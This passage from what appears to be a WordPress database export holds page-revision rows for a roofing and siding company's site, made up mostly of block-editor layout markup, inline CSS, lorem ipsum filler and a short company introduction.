.block-c7fcd398-33f3-4e55-90b5-edaeb87e38e7 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-c7fcd398-33f3-4e55-90b5-edaeb87e38e7 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-c7fcd398-33f3-4e55-90b5-edaeb87e38e7 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-c7fcd398-33f3-4e55-90b5-edaeb87e38e7 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-c7fcd398-33f3-4e55-90b5-edaeb87e38e7 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-c7fcd398-33f3-4e55-90b5-edaeb87e38e7\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"719252bf-3847-48c5-978d-ad754c743e81\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-719252bf-3847-48c5-978d-ad754c743e81 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-719252bf-3847-48c5-978d-ad754c743e81 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-719252bf-3847-48c5-978d-ad754c743e81 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-719252bf-3847-48c5-978d-ad754c743e81 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-719252bf-3847-48c5-978d-ad754c743e81 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-719252bf-3847-48c5-978d-ad754c743e81\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Insurance','','inherit','closed','closed','','226-revision-v1','','','2022-08-22 19:25:50','2022-08-22 19:25:50','',226,'https://cteisys.com/?p=374',0,'revision','',0),(378,1,'2022-08-22 19:28:29','2022-08-22 19:28:29','<!-- wp:shortcode -->\n[contact-form-7 id=\"6\" title=\"Contact form 1\"]\n<!-- /wp:shortcode -->','Contact Layout 1','','inherit','closed','closed','','140-revision-v1','','','2022-08-22 19:28:29','2022-08-22 19:28:29','',140,'https://cteisys.com/?p=378',0,'revision','',0),(500,1,'2022-08-25 00:19:10','2022-08-25 00:19:10','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6572cb3a-e562-4038-ad61-6f87d52a0653\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-6572cb3a-e562-4038-ad61-6f87d52a0653 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6572cb3a-e562-4038-ad61-6f87d52a0653.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6572cb3a-e562-4038-ad61-6f87d52a0653.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6572cb3a-e562-4038-ad61-6f87d52a0653.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"4aa597f7-bf32-48a4-a97d-ab721c46fd1f\"} -->\n<style type=\"text/css\"> .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"e47140c0-e0cf-490c-8e07-8547639ead1a\"} -->\n<style type=\"text/css\"> .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e47140c0-e0cf-490c-8e07-8547639ead1a\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"c574290d-0b76-4326-958f-c0f3a4df2f20\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-c574290d-0b76-4326-958f-c0f3a4df2f20 background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a0cc88e5-b846-45db-9d00-0bc679273fb7\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a0cc88e5-b846-45db-9d00-0bc679273fb7\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"ff268419-3a77-4274-b411-46ce7ae7d0da\"} -->\n<style type=\"text/css\"> .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ff268419-3a77-4274-b411-46ce7ae7d0da\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"819d03eb-ca79-4f68-a4a6-6e4c3c07bc39\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"8122658a-190a-460d-b1f0-852c8f7b6cfb\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-8122658a-190a-460d-b1f0-852c8f7b6cfb background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: 